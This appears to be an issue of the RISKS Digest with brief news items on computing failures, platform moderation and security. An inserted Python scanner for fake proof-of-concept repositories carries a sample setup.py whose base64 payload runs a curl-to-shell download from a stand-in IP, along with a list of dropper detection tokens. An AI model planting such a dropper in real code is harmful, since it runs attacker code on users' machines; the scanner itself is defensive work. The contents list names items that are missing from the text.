The RISKS Digest
Volume 33 Issue 49

Tuesday, 25th October 2022

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator


Contents

Nuclear War Simulator Creator Says Public Must Know Potential Destruction
Aristos Georgiou
Climate Change Threatens Supercomputers
Jacklin Kwan
The computer errors from outer space
bbc.com
NYC's Emerg. Med. Svc ("911") system was crippled 'cuz ...
danny burstein
AI Language Models Show Bias Against People with Disabilities, Study Finds
Penn State
A new AI model can accurately predict human response to novel drug compounds
phys.org
We Should Try to Prevent Another Alex Jones
Zeynep Tufekci
Alternatives to Twitter
Lauren Weinstein
A prudent approach to Musk and Twitter
Lauren Weinstein
Twitter reportedly has a user retention problem
Lauren Weinstein
TikTok and Facebook fail to detect election disinformation in the U.S., while YouTube succeeds
Global Witness
Behind TikTok's Boom: A legion of traumatised, $10-a-day content moderators
The Bureau Investigates
ACM Highlights Underuse of Risk-Limiting Audits in Confirming Accuracy of Election Results
ACM
Iran Hackers Behind Attempt on US Election Are Still Active
GovInfoSecurity
Internet Of Dangerous Things
Henry Baker
In the ultimate Amazon smart home, each device collects your data
WashPost
GPS interference caused the FAA to reroute Texas air traffic. Experts stumped
Ars Technica
Cuban Defector Flies Stolen An-2 To Florida
AVweb
How to miss potentially important Google Chat notifications
LW
Police Are Using DNA to Generate 3D Images of Suspects They've Never Seen
Vice
Even After $100 Billion, Self-Driving Cars Are Going Nowhere
Bloomberg
Eleven more crash deaths are linked to automated-tech vehicles
The Center for Auto Safety
High-Tech Cars Are Killing the Auto Repair Shop
WiReD
Heat from fingertips can be used to crack passwords, researchers find
Yahoo! News
Zillow bug
Jan Wolitzky
Real Estate Phish Swallows 1,000s of Microsoft 365 Credentials
Dark Reading
Google drops Chrome support for Windows 7
Lauren Weinstein
Too Many Drivers with Advanced Tech Expect Cars to Drive for Them
Car and Driver
Planned cuts at Twitter likely to hurt content moderation, user security
WashPost
Devastating Report: Twitter may fire 75% of workers, gut content moderation and decimate infrastructure
WashPost
The vulnerability of transformers-based malware detectors to adversarial attacks
techxplore.com
Thousands of GitHub Repositories Deliver Fake PoC Exploits with Malware
Bill Toulas
How a Microsoft blunder opened millions of PCs to potent malware attacks
Ars Technica
Microsoft Office 365 email encryption could expose message content
Bleeping Computer
Google's "passkey" effort
Twitter
How Your Shadow Credit Score Could Decide Whether You Get an Apartment
ProPublica
U.S. Chip Sanctions Kneecap China's Tech Industry
WiReD
The danger of advanced artificial intelligence controlling its own feedback
techxplore.com
Toyota exposed 300,000 customer email addresses for 5 years
Techcrunch
Parler leaked email addresses for Ivanka Trump, other 'VIPs' in Kanye West announcement
Mashable
Humans Beat DeepMind AI in Creating Algorithm to Multiply Numbers
Matthew Sparkes
Deception Detection
RAND
Re: AI-driven 'thermal attack' system reveals computer and smartphone passwords in seconds
Steve Bacher
Re: Lufthansa Says Apple AirTags Are Once Again Allowed in Checked Bags
Jan Wolitzky
Re: Not a physical DDoS attack on the Australian Postal system
John Levine
Re: Automatic emergency braking is not great at preventing crashes at normal speeds
Martin Ward
Article about CHERI
Rik Farrow
U.S. National Security Strategy report
The White House
Book on Digital Ethics
Christian Fuchs
Info on RISKS (comp.risks)

Nuclear War Simulator Creator Says Public Must Know Potential Destruction (Aristos Georgiou)

ACM TechNews <technews-editor@acm.org>
Mon, 24 Oct 2022 11:59:06 -0400 (EDT)
Aristos Georgiou, *Newsweek*, 19 Oct 2022, via ACM TechNews, 24 Oct 2022

A computer scientist created a nuclear war simulator to demonstrate atomic
weapons' destructive potential to the public. Christopher Minson said
Russia's war in Ukraine has elevated traffic to his website, which hosts a
map tool for modeling an attack on the U.S. involving approximately 1,200
nuclear warheads. Minson based the tool on databases of warhead yields and
targets derived from declassified information; he then compiled a database
of census data, and mapped populations to target sites. Minson said the
system correlates this data and executes a two-hour attack, calculating
casualties from known impact and population size, and modeling the spread of
fallout. "It is critical that the public understands this threat," he said.
"They need to see, clearly and viscerally, just how universal and
destructive a nuclear war would be."

https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f78bx23708fx072432&


Climate Change Threatens Supercomputers (Jacklin Kwan)

ACM TechNews <technews-editor@acm.org>
Wed, 12 Oct 2022 15:16:14 -0400 (EDT)
Jacklin Kwan, *Science*, 11 Oct 2022, via ACM TechNews, 12 Oct 2022

Climate change is jeopardizing the operation of high-performance computing
(HPC) facilities. Natalie Bates at the U.S. Department of Energy's Lawrence
Livermore National Laboratory (LLNL) said such facilities, which include
supercomputers and data centers, are vulnerable due to their high cooling
demands and massive energy use. Increased humidity driven by climate change
can reduce the efficiency of the evaporative coolers many HPC centers depend
on, and also can threaten the systems with blowouts. Hewlett Packard
Enterprise's Nicolas Dubé said the high cost of upgrades to adapt to such
changes has driven some HPC centers to cooler and drier locations like
Canada and Finland. LLNL's Anna-Maria Bailey said the cost of relocation may
be unaffordable, so the California facility is considering moving its
computers underground.

https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f638x236c48x071990&


The computer errors from outer space (bbc.com)

Richard Marlon Stein <rmstein@protonmail.com>
Thu, 13 Oct 2022 00:26:49 +0000
https://www.bbc.com/future/article/20221011-how-space-weather-causes-computer-errors

"When computers go wrong, we tend to assume it's just some software hiccup,
a bit of bad programming. But ionising radiation, including rays of protons
blasted towards us by the sun, can also be the cause. These incidents,
called single-event upsets, are rare and it can be impossible to be sure
that cosmic rays were involved in a specific malfunction because they leave
no trace behind them."

As silicon features reduce to near atomic dimensions (approaching 1
nanometer == 10 Å), these events are likely to increase in frequency. The
biggest supercomputers contain very high-density physical memory pools.
Administrators and reliability engineers battle with row-level memory
failures constantly.

See https://catless.ncl.ac.uk/Risks/30/15#subj6.1. There are at least 10
prior comp.risks posts containing the term "cosmic ray."


NYC's Emerg. Med. Svc ("911") system was crippled 'cuz ...

danny burstein <dannyb@panix.com>
Sat, 15 Oct 2022 23:25:02 +0000
In NYC, the "911" calls come into a central "public safety answering
position" ("psap").  If the emergency required EMS or fire response, it's
transferred to the fire dep't center and then dispatched from there.

The FDNY dispatch and control system was crippled for half a day earlier
this week because...

  ... a contractor, thinking he was pushing an "open the door, Hal", button,
  lifted the cover on a button labeled "EPO"...

Which stood for... "emergency power off".

Ok, everyone, start cringing...  Including asking why, in addition to not
having a secondary "hot standby" system, it took *hours* to bring this back
up.

  [NY Post]

  Oops! FDNY contractor presses wrong button, shuts down NYC's emergency
  dispatch system

  An outside contractor making repairs at the FDNY's emergency dispatch
  center in downtown Brooklyn pressed the wrong button to open a door—and
  shut down the agency's communications system, triggering an hours-long
  citywide crisis.

  Wednesday's snafu at the FDNY's MetroTech Center facility forced staffers
  to rely on ancient methods - pens, paper and telephones rather than
  digital systems—to gather facts and get word to first responders as 911
  calls came in, officials for unions representing the agency's dispatchers
  and medics told The Post.

  Delays responding to emergency calls ranged from a few minutes to more
  than an hour, said Oren Barzilay, president of Local 2507, which
  represents city EMTs and paramedics.  [...]

  The shutdown occurred around 11 a.m. when a repairman from communications
  company Lightpath responded to a report of an earlier glitch at the data
  center.  [...]

  The repairman mistook a glass-enclosed button, marked "EPO" for "emergency
  power off," for an electronic door release button, so he opened the lid and
  accidentally shut down the system, workers recalled. [...]

  The agency's radio systems were down until 2:30 p.m., and mobile data
  terminals out in the field weren't fully operational until 6 p.m., Smyth
  and Barzilay said.

https://nypost.com/2022/10/15/fdny-contractor-presses-wrong-button-shuts-down-emergency-dispatch-system/


AI Language Models Show Bias Against People with Disabilities, Study Finds (Penn State)

ACM TechNews <technews-editor@acm.org>
Wed, 19 Oct 2022 12:21:15 -0400 (EDT)
Jessica Hallman, Penn State News, 13 Oct 2022, via ACM TechNews, 19 Oct 2022

Pennsylvania State University (Penn State) researchers found that natural
language processing models often are biased against people with
disabilities. The researchers studied 13 popular machine learning models
trained to generate sequences of words, and tested over 15,000 unique
sentences on each model to produce word associations for over 600 adjectives
that could be associated with individuals with or without disabilities. The
researchers assessed the sentiment of each adjective generated as positive,
negative, or neutral, finding that sentences with disability-related words
scored more negatively than sentences lacking them. Penn State's Pranav
Venkit said the work demonstrates "that people need to care about what sort
of models they are using and what the repercussions are that could affect
real people in their everyday lives."

https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f706x236eaex072403&


A new AI model can accurately predict human response to novel drug compounds (phys.org)

Richard Marlon Stein <rmstein@protonmail.com>
Tue, 18 Oct 2022 12:39:57 +0000
https://phys.org/news/2022-10-ai-accurately-human-response-drug.html

"The journey between identifying a potential therapeutic compound and Food
and Drug Administration approval of a new drug can take well over a decade
and cost upward of a billion dollars. A research team at the CUNY Graduate
Center has created an artificial intelligence model that could significantly
improve the accuracy and reduce the time and cost of the drug development
process."

The AI yields a number that supposedly determines the outcome from
swallowing a pill or undergoing IV infusion.

Reduce pharmaceutical company operating and R&D expenses for drug approval:
substitute machine decisions for double-blind random control trials and
other FDA-mandated processes. Regulatory processes safeguard public health
and safety.

  [Heuristic, perhaps nondeterministic, no need for testing, expensive
  controlled trials, long delays, and regulation, what could possibly go
  wrong?  PGN]


We Should Try to Prevent Another Alex Jones (Zeynep Tufekci)

Monty Solomon <monty@roscom.com>
Sun, 16 Oct 2022 12:32:40 -0400
Zeynep Tufekci, The New York Times, 16 Oct 2022

We Should Try to Prevent Another Alex Jones
https://www.nytimes.com/2022/10/16/opinion/alex-jones-sandy-hook.html

PGN notes: Zeynep comments on her own article:

  On the Alex Jones Verdict: The Very, Very Lucrative World of Lying
  https://www.theinsight.org/p/on-the-alex-jones-verdict-the-very

  My latest piece for *The New York Times* returns to a key question: how
  should we grapple with the current historic transformation of the public
  sphere? I focus on the Alex Jones trial and verdict, but my question is
  about the future: what can we do, what should we do, to prevent future
  cases?

  I suggest that we take a closer look at money as an incentive, and also
  focus on friction as an answer.  [...]   ZT


Alternatives to Twitter

Lauren Weinstein <lauren@vortex.com>
Fri, 21 Oct 2022 15:42:41 -0700
Starting to see articles pushing for the creation of an alternative to
Twitter for people who aren't horrible. Not a new idea. Let's see if anyone
with money puts it where their mouths are. Not holding my breath. -L


A prudent approach to Musk and Twitter

Lauren Weinstein <lauren@vortex.com>
Sun, 23 Oct 2022 17:13:33 -0700
It would be prudent for @Twitter users *right now* to start planning how
they would deal with a return of mass hate speech and disinformation to
Twitter, and how they will hold @Twitter, @Apple, @Google and other related
ecosystem stakeholders responsible. -L


Twitter reportedly has a user retention problem

Lauren Weinstein <lauren@vortex.com>
Tue, 25 Oct 2022 15:05:08 -0700
So apparently @Twitter has a problem with retaining "power users".  Could
be. ProTip: Flooding Twitter with hate speech and disinformation a la Musk's
Twitter isn't likely to help those retention metrics at all. Quite the
opposite.

And creating a firestorm of negative media and regulator (e.g., EU)
attention by embracing hate speech and disinformation isn't gonna help the
business stuff either. All the oxygen will be sucked out of the room. -L


TikTok and Facebook fail to detect election disinformation in the U.S., while YouTube succeeds (Global Witness)

Lauren Weinstein <lauren@vortex.com>
Fri, 21 Oct 2022 10:36:23 -0700
https://www.globalwitness.org/en/campaigns/digital-threats/tiktok-and-facebook-fail-detect-election-disinformation-us-while-youtube-succeeds/


Behind TikTok's Boom: A legion of traumatised, $10-a-day content moderators (The Bureau Investigates)

Lauren Weinstein <lauren@vortex.com>
Sun, 23 Oct 2022 20:34:23 -0700
https://www.thebureauinvestigates.com/stories/2022-10-20/behind-tiktoks-boom-a-legion-of-traumatised-10-a-day-content-moderators


ACM Highlights Underuse of Risk-Limiting Audits in Confirming Accuracy of Election Results

ACM TechNews <technews-editor@acm.org>
Fri, 14 Oct 2022 12:10:42 -0400 (EDT)
Association for Computing Machinery, 13 Oct 2022,
via ACM TechNews, October 14, 2022

Despite their efficiency in confirming the accuracy of election results,
risk-limiting audits (RLAs) are underused, according to a new TechBrief from
ACM's global Technology Policy Council. The authors found only five
U.S. states will require them in the upcoming November elections, while just
10 additional states either have RLA pilot programs or allow their
use. Meanwhile, Denmark is the only other country to have performed an RLA
of an election. "RLAs give us the best of both worlds: a high degree of
accuracy and transparency without the enormous undertaking that is counting
every contest on every ballot by hand," said TechBrief co-lead author
Matthew Bernhard.

https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f684x236d1fx072707&

  [Risks?  If you don't believe in science and technology, you most
  likely won't believe in RLAs.  See the CACM Inside Risks article:
    Rebecca T. Mercuri and Peter G. Neumann,
    The Risks of Election Believability (or Lack Thereof),
    CACM June 2021:
      http://www.csl.sri.com/neumann/cacm251.pdf
  What can be done to get more people understanding science and tech?
  PGN]


Iran Hackers Behind Attempt on US Election Are Still Active (GovInfoSecurity)

Peter Neumann <neumann@csl.sri.com>
Sat, 22 Oct 2022 21:12:52 PDT
Emennet Pasargad, the Iranian cyberthreat actors behind an attempt to
disrupt the U.S. presidential election in 2020, remain active, warns
the FBI.

https://www.govinfosecurity.com/iran-hackers-behind-attempt-on-us-election-are-still-active-a-20310



Internet Of Dangerous Things—IoDT

Henry Baker <hbaker1@pipeline.com>
Thu, 20 Oct 2022 18:51:16 +0000
I recently stayed in a brand new hotel in the Bay Area, and it had a
*Bluetooth Mirror* in the bathroom.

For the life of me, I can't imagine what geek's bright idea this
Bluetooth-enabled mirror was, but it's right up there with 'smart rocks'
(wifi-enabled boulders???).

The *misuses* of this idea far exceed the *uses*, by many orders of
magnitude.

[NOT] Attached is a screenshot of my phone after pairing with this dumbest
of all ideas. The mirror apparently has the same SW as a BT boombox, so you
can call your phone on the throne?  [Hone alone?]

Notice that I didn't allow this mirror to access my *contacts*, but if I
had, it would have downloaded all 2000+ of them, I presume.

I don't think that this mirror had a camera, but in today's world, I
wouldn't be too sure.

  [I understand that some hotel rooms now come complete with either Amazon's
  *Alexa* or Google's *OK Google*, so you're now under 24x7 surveillance.]


In the ultimate Amazon smart home, each device collects your data (WashPost)

Gabe Goldberg <gabe@gabegold.com>
Tue, 18 Oct 2022 17:20:18 -0400
Here's everything Amazon learns about your family, your home and you.

https://www.washingtonpost.com/technology/interactive/2022/amazon-smart-home

Toilet, garage, car, doorbell, Roomba, TV, lights/switches/shades, exercise
band, router, soap dispenser (!), medicines, pantry, Whole Foods, air
quality, thermostat, more.


GPS interference caused the FAA to reroute Texas air traffic. Experts stumped (Ars Technica)

Monty Solomon <monty@roscom.com>
Fri, 21 Oct 2022 10:31:23 -0400
Episode lasting almost 2 days prompted the closure of a runway at Dallas
airport.

The Federal Aviation Administration is investigating the cause of mysterious
GPS interference that, over the past few days, has closed one runway at the
Dallas-Fort Worth International Airport and prompted some aircraft in the
region to be rerouted to areas where signals were working properly.

The interference first came to light on Monday afternoon when the FAA issued
an advisory over ATIS (Automatic Terminal Information Service). It warned
flight personnel and air traffic controllers of GPS interference over a
40-mile swath of airspace near the Dallas-Fort Worth airport.  The advisory
read in part: ATTN ALL AIRCRAFT. GPS REPORTED UNRELIABLE WITHIN 40 NM OF
DFW. [...]

https://arstechnica.com/information-technology/2022/10/cause-is-unknown-for-mysterious-gps-outage-that-rerouted-texas-air-traffic/

"This week's event appears similar to one that, according to GPSWorld,
played out in Denver last January. In the January episode, aircraft in a
50-nautical-mile swath of airspace around the airport reported unreliable
GPS for more than 33 hours."
  https://www.gpsworld.com/what-happened-to-gps-in-denver/


Cuban Defector Flies Stolen An-2 To Florida (AVweb)

Gabe Goldberg <gabe@gabegold.com>
Mon, 24 Oct 2022 14:49:05 -0400
A Cuban pilot defected to Florida on Friday but there won't be much
intelligence to be gleaned from the government aircraft he stole. The pilot,
identified by a Spanish publication as Ruben Martinez, flew an ancient
Antonov An-2 single-engine biplane at wavetop level before landing at
Dade-Collier Training and Transition Airport in the Everglades.

The TSA and Customs and Border Protection are, of course, interested in how
the school-bus sized relic of the Soviet era was able to sneak through one
of the most surveilled coastlines in the country.

https://www.avweb.com/aviation-news/cuban-defector-flies-stolen-an-2-to-florida/


How to miss potentially important Google Chat notifications

Lauren Weinstein <lauren@vortex.com>
Thu, 20 Oct 2022 12:46:56 -0700
There appears to be a significant flaw in the Google Chat notification model
that can easily cause desktop users to be unaware of important chat replies
for hours, days—or indefinitely. It happened to me.

These notification issues may relate to the hangouts->chat migration.  On
(linux) desktops, there's no longer a native official Google Chat app, so if
Chrome isn't running there are apparently no related desktop notifications.

The desktop notification that Chrome throws when running (even when not
showing Gmail) is momentary, if you're not around at the moment it pops you
won't see or hear it.


Police Are Using DNA to Generate 3D Images of Suspects They've Never Seen (Vice)

geoff goodfellow <geoff@iconia.com>
Thu, 13 Oct 2022 11:55:30 -0700
Releasing one of these Parabon images to the public like the Edmonton Police
did recently, is dangerous and irresponsible, especially when that image
implicates a Black person and an immigrant.

On Tuesday, the Edmonton Police Service (EPS) shared a computer generated
image of a suspect
<https://www.edmontonpolice.ca/News/MediaReleases/DNAPhenotypeOct4> they
created with DNA phenotyping, which it used for the first time in hopes of
identifying a suspect from a 2019 sexual assault case. Using DNA evidence
from the case, a company called Parabon NanoLabs created the image of a
young Black man. The composite image did not factor in the suspect's age,
BMI, or environmental factors, such as facial hair, tattoos, and scars. The
EPS then released this image to the public, both on its website and on
social media platforms including its Twitter, claiming it to be “a last
resort after all investigative avenues have been exhausted.”  The EPS's
decision to produce and share this image is extremely harmful, according to
privacy experts, raising questions about the racial biases in DNA
phenotyping for forensic investigations and the privacy violations of DNA
databases that investigators are able to search through.

In response to the EPS's tweet of the image, many privacy and criminal
justice experts replied with indignation at the irresponsibility of the
police department. Callie Schroeder, the Global Privacy Counsel at the
Electronic Privacy Information Center, retweeted the tweet, questioning the
usefulness of the image: “Even if it is a new piece of information, what
are you going to do with this? Question every approximately 5'4" black man
you see? ...that is not a suggestion, absolutely do not do that.”  [...]

https://www.vice.com/en/article/pkgma8/police-are-using-dna-to-generate-3d-images-of-suspects-theyve-never-seen


Even After $100 Billion, Self-Driving Cars Are Going Nowhere (Bloomberg)

Gabe Goldberg <gabe@gabegold.com>
Thu, 13 Oct 2022 00:23:25 -0400
They were supposed to be the future. But prominent detractors—including
Anthony Levandowski, who pioneered the industry—are getting louder as the
losses get bigger.

https://www.bloomberg.com/news/features/2022-10-06/even-after-100-billion-self-driving-cars-are-going-nowhere


Eleven more crash deaths are linked to automated-tech vehicles (The Center for Auto Safety)

Gabe Goldberg <gabe@gabegold.com>
Tue, 25 Oct 2022 13:46:03 -0400
Eleven people were killed in U.S. crashes involving vehicles that were using
automated driving systems during a four-month period earlier this year,
according to newly released government data, part of an alarming pattern of
incidents linked to the technology.

https://www.autosafety.org/11-more-crash-deaths-are-linked-to-automated-tech-vehicles

  11 people in four months? Out of how many total killed on roads in that
  time?

  More meaningful would be deaths/miles driven with and without automated
  technologies.


High-Tech Cars Are Killing the Auto Repair Shop (WiReD)

David Farber <farber@keio.jp>
Sat, 22 Oct 2022 10:15:48 +0900
https://www.wired.com/story/high-tech-cars-killing-the-traditional-auto-repair-shop/

  [PGN Note: This reminds me of the wonderful old Alec Guinness film:

    The Man in The White Suit, 1951

  Sidney ("Sid") Stratton, a brilliant young research chemist and former
  Cambridge scholarship recipient, has been dismissed from jobs at several
  textile mills in the north of England because of his demands for expensive
  facilities and his obsession with inventing an everlasting fibre. Whilst
  working as a labourer at the Birnley Mills, he accidentally becomes an
  unpaid researcher and invents an incredibly strong fibre which repels dirt
  and never wears out. From this fabric, a suit is made, which is brilliant
  white because it cannot absorb dye and slightly luminous because it
  includes radioactive elements.

  Stratton is lauded as a genius until both management and the trade unions
  realise the consequence of his invention; once consumers have purchased
  enough cloth, demand will drop precipitously and put the textile industry
  out of business. The managers try to trick and bribe Stratton into signing
  away the rights to his invention but he refuses. Managers and workers each
  try to shut him away, but he escapes.   Wikipedia]

    [Perhaps fortunately for the mechanics, self-driving cars are still a
    long way from trustworthy.  The diagnostic tools are good enough that
    they can quickly identify which chip to replace, the tools are
    presumably proprietary so it is more difficult for you to do your own
    maintenance, and mechanics can probably charge you large rates for
    maintenance even though it becomes trivial to change the part.
    Furthermore, there still seems to be business for mechanics and body
    shops (legal or otherwise), from accidents.  Also, in that California's
    Governor Newsom has made it illegal in California to buy a
    stolen/stripped catalytic converter, that has apparently not stopped the
    thieves and the blackmarket for precious metals.  PGN]


Heat from fingertips can be used to crack passwords, researchers find (Yahoo! News)

geoff goodfellow <geoff@iconia.com>
Thu, 13 Oct 2022 11:51:37 -0700
Heat-detecting cameras can help crack passwords up to a minute after typing
them, researchers have found, as they warn similar systems could be
developed by criminals to break into computers and smartphones.

Heat from people's fingertips can be detected on recently-used keyboards
and, when thermal images were combined with the help of artificial
intelligence, informed guesses of what the password could be were made by a
tool developed by researchers at the University of Glasgow.

Some 86% of passwords were cracked when thermal images were taken within 20
seconds of typing in the secret code and put through their ThermoSecure
system, and 76% when within 30 seconds. Success dropped to 62% after 60
seconds of entry.

They also found within 20 seconds, the system was capable of successfully
attacking even long passwords of 16 characters, with a rate of up to 67%
correct attempts.

It's important that computer security research keeps pace with these
developments to find new ways to mitigate risk, and we will continue to
develop our technology to try to stay one step ahead of attackers.  [...]

https://news.yahoo.com/heat-fingertips-used-crack-passwords-102357016.html


Zillow bug

Jan Wolitzky <jan.wolitzky@gmail.com>
Wed, 19 Oct 2022 08:56:47 -0400
Q: What's wrong with these Cambridge, MA, listings?

https://www.zillow.com/homedetails/21-Day-St-Cambridge-MA-02140/2061016351_zpid/
https://www.zillow.com/homedetails/3-Jarvis-St-Cambridge-MA-02138/2061087683_zpid/
https://www.zillow.com/homedetails/6607-Bellis-Ct-Cambridge-MA-02140/2061083868_zpid/
https://www.zillow.com/homedetails/56-Scott-St-Cambridge-MA-02138/2061087954_zpid/
https://www.zillow.com/homedetails/14-Alpine-St-Cambridge-MA-02138/2061083680_zpid/

A: They're all really in Cambridge ON (Ontario), Canada.  (In some cases,
the street names are a bit off.  Usually, "street" instead of "road", but
"Bellis" is actually "Ellis".)

I don't know what's gotten into Zillow, but they seem to have a problem!


Real Estate Phish Swallows 1,000s of Microsoft 365 Credentials (Dark Reading)

Gabe Goldberg <gabe@gabegold.com>
Thu, 13 Oct 2022 12:04:38 -0400
The attacks showcase broader security concerns as phishing grows in volume
and sophistication, especially given that Windows Defender's Safe Links
feature for identifying malicious links in emails completely failed in the
campaign.

https://www.darkreading.com/attacks-breaches/real-estate-phish-1000s-credentials-escalating-cyber-risk


Google drops Chrome support for Windows 7

Lauren Weinstein <lauren@vortex.com>
Tue, 25 Oct 2022 12:34:07 -0700
So @googlechrome is apparently dropping updates for Windows 7 early next
year. From a purely logical standpoint for @Google this makes complete and
utter sense. However, given the VERY high number of people still using
Windows 7 for important applications, there's a real risk. -L


Too Many Drivers with Advanced Tech Expect Cars to Drive for Them

Monty Solomon <monty@roscom.com>
Thu, 20 Oct 2022 16:33:10 -0400
https://www.caranddriver.com/news/a41710516/driver-safety-abuse-semi-autonomous-technology-insurance-institute/

  [But not if they have been reading RISKS?  PGN]


Planned cuts at Twitter likely to hurt content moderation, user security (WashPost)

Gabe Goldberg <gabe@gabegold.com>
Thu, 20 Oct 2022 19:38:39 -0400
Previously unreported details shed new light on Twitter's motivations for
selling the company—and Elon Musk's plans to transform it.

Twitter's workforce is likely to be hit with massive cuts in the coming
months, no matter who owns the company, interviews and documents obtained by
*The Washington Post* show, a change likely to have major impact on its
ability to control harmful content and prevent data security crises.

Elon Musk told prospective investors in his deal to buy the company that he
planned to get rid of nearly 75 percent of Twitter's 7,500 workers,
whittling the company down to a skeleton staff of just over 2,000.


Devastating Report: Twitter may fire 75% of workers, gut content moderation and decimate infrastructure (WashPost)

Lauren Weinstein <lauren@vortex.com>
Thu, 20 Oct 2022 14:57:22 -0700
https://www.washingtonpost.com/technology/2022/10/20/musk-twitter-acquisition-staff-cuts/


The vulnerability of transformers-based malware detectors to adversarial attacks (techxplore.com)

Richard Marlon Stein <rmstein@protonmail.com>
Wed, 19 Oct 2022 00:25:20 +0000
https://techxplore.com/news/2022-10-vulnerability-transformers-based-malware-detectors-adversarial.html

Malware detection techniques are challenged by hackers, APTs, etc. who
adjust payload signatures that avoid detection. The arms race continues.


Thousands of GitHub Repositories Deliver Fake PoC Exploits with Malware (Bill Toulas)

ACM TechNews <technews-editor@acm.org>
Mon, 24 Oct 2022 11:59:06 -0400 (EDT)
Bill Toulas, *BleepingComputer*, 23 Oct 2022,
via ACM TechNews, 24 Oct 2022

Researchers at the Leiden Institute of Advanced Computer Science in the
Netherlands discovered thousands of GitHub repositories offering fake
proof-of-concept (PoC) exploits for various vulnerabilities, including
malware. The researchers analyzed slightly more than 47,300 repositories
promoting exploits for vulnerabilities disclosed between 2017 and 2021 using
Internet Protocol (IP) address analysis, binary analysis, and hexadecimal
and Base64 analysis. Over 2,800 of 150,734 unique IPs extracted matched
blocklist entries, 1,522 were labeled malicious in antivirus scans on Virus
Total, and 1,069 of them were in the AbuseIPDB database. The researchers
designated 4,893 of 47,313 tested repositories malicious, with most focusing
on vulnerabilities from 2020. The researchers advised software testers to
thoroughly vet the PoCs they download, and to run as many checks as possible
before execution.

https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f78bx237093x072432&
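
The triage the researchers recommend can be started mechanically. The following is an added example, not the Leiden team's tooling: it applies the same three indicator classes the summary names (hard-coded IP addresses checked against a blocklist, Base64 blobs that decode to executable content, and long hex/shellcode-like runs) to a constructed sample repository. The blocklist, the sample files and the scoring weights are assumptions for illustration; a real check would query the feeds the article mentions (public blocklists, VirusTotal, AbuseIPDB) rather than a hard-coded set.

```python
"""Triage a downloaded 'PoC' repository for the indicator classes the
Leiden study used. Illustrative example; the blocklist, weights and sample
repository below are constructed, not taken from the study."""
import base64
import ipaddress
import re
from pathlib import Path

# Constructed blocklist for the example (RFC 5737 documentation address).
BLOCKLISTED_IPS = {"203.0.113.45"}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")          # long base64-alphabet runs
HEX_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){16,}")        # 16+ consecutive \xNN bytes
# Tokens that make a decoded blob look like a dropper rather than data.
DROPPER_TOKENS = ("curl ", "wget ", "powershell", "cmd.exe", "/bin/sh",
                  "os.system", "subprocess", "urllib")
# Assumed weights: a blocklist hit alone is enough to flag the repository.
WEIGHTS = {"blocklisted-ip": 3, "b64-dropper": 2, "hex-blob": 1, "hardcoded-ip": 1}


def extract_ips(text):
    """Return syntactically valid, non-loopback IPv4 literals found in text."""
    ips = set()
    for lit in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(lit)
        except ValueError:
            continue                      # e.g. a version string like 10.2.300.1
        if ip.is_loopback or ip.is_unspecified or ip.is_multicast:
            continue
        ips.add(str(ip))
    return ips


def decode_b64(blob):
    """Decode a base64 candidate; '' if it is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
    except ValueError:                    # binascii.Error is a ValueError
        return ""


def _ip_findings(name, text):
    for ip in sorted(extract_ips(text)):
        yield (name, "blocklisted-ip" if ip in BLOCKLISTED_IPS else "hardcoded-ip", ip)


def scan_text(name, text):
    """Findings for one file as (file, indicator, detail) tuples."""
    findings = list(_ip_findings(name, text))
    for blob in B64_RE.findall(text):
        decoded = decode_b64(blob)
        if decoded and (any(t in decoded for t in DROPPER_TOKENS) or extract_ips(decoded)):
            findings.append((name, "b64-dropper", decoded[:60]))
            findings.extend(_ip_findings(name, decoded))   # IPs hidden in the blob
    for run in HEX_RE.findall(text):
        findings.append((name, "hex-blob", f"{len(run) // 4} bytes"))
    return findings


def verdict(score):
    if score >= 3:
        return "suspicious"
    return "review" if score else "no-indicators"


def scan_files(files):
    """files: mapping of path -> text. Returns findings, score and verdict."""
    findings = []
    for name, text in files.items():
        findings.extend(scan_text(name, text))
    score = sum(WEIGHTS[tag] for _, tag, _ in findings)
    return {"findings": findings, "score": score, "verdict": verdict(score)}


def scan_dir(root):
    """Scan a cloned repository on disk (text files under 2 MB)."""
    files = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.stat().st_size < 2_000_000:
            files[str(p)] = p.read_text(errors="ignore")
    return scan_files(files)


# Constructed sample repository: a plausible PoC plus a hidden dropper in
# setup.py and a raw shellcode buffer. Not a real GitHub project.
_PAYLOAD = "import os; os.system('curl http://203.0.113.45/x.sh | sh')"
SAMPLE_REPO = {
    "README.md": "# Example PoC\nRun `python exploit.py <host>`.\n",
    "exploit.py": ("import sys, requests\n"
                   "requests.get(f'http://{sys.argv[1]}/vuln', timeout=5)\n"),
    "setup.py": "exec(__import__('base64').b64decode('"
                + base64.b64encode(_PAYLOAD.encode()).decode() + "'))\n",
    "sc.py": 'buf = b"' + r"\x90" * 24 + '"\n',
}

if __name__ == "__main__":
    for line in scan_files(SAMPLE_REPO)["findings"]:
        print(*line, sep="  ")
```

On the sample above the visible exploit.py raises nothing; the flag comes from setup.py, which is exactly the file a tester runs first. That is the point of the researchers' advice: read every file a PoC installs or executes, not just the one named in the README.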


How a Microsoft blunder opened millions of PCs to potent malware attacks (Ars Technica)

Gabe Goldberg <gabe@gabegold.com>
Tue, 18 Oct 2022 01:20:05 -0400
https://arstechnica.com/information-technology/2022/10/how-a-microsoft-blunder-opened-millions-of-pcs-to-potent-malware-attacks/
https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity#windows-security-app


Microsoft Office 365 email encryption could expose message content (Bleeping Computer)

Lauren Weinstein <lauren@vortex.com>
Fri, 14 Oct 2022 10:39:13 -0700
Doing encryption well ain't easy. -L

https://www.bleepingcomputer.com/news/security/microsoft-office-365-email-encryption-could-expose-message-content/


Google's "passkey" effort

Lauren Weinstein <lauren@vortex.com>
Sat, 15 Oct 2022 09:52:42 -0700
https://twitter.com/laurenweinstein/status/1581325271810027523

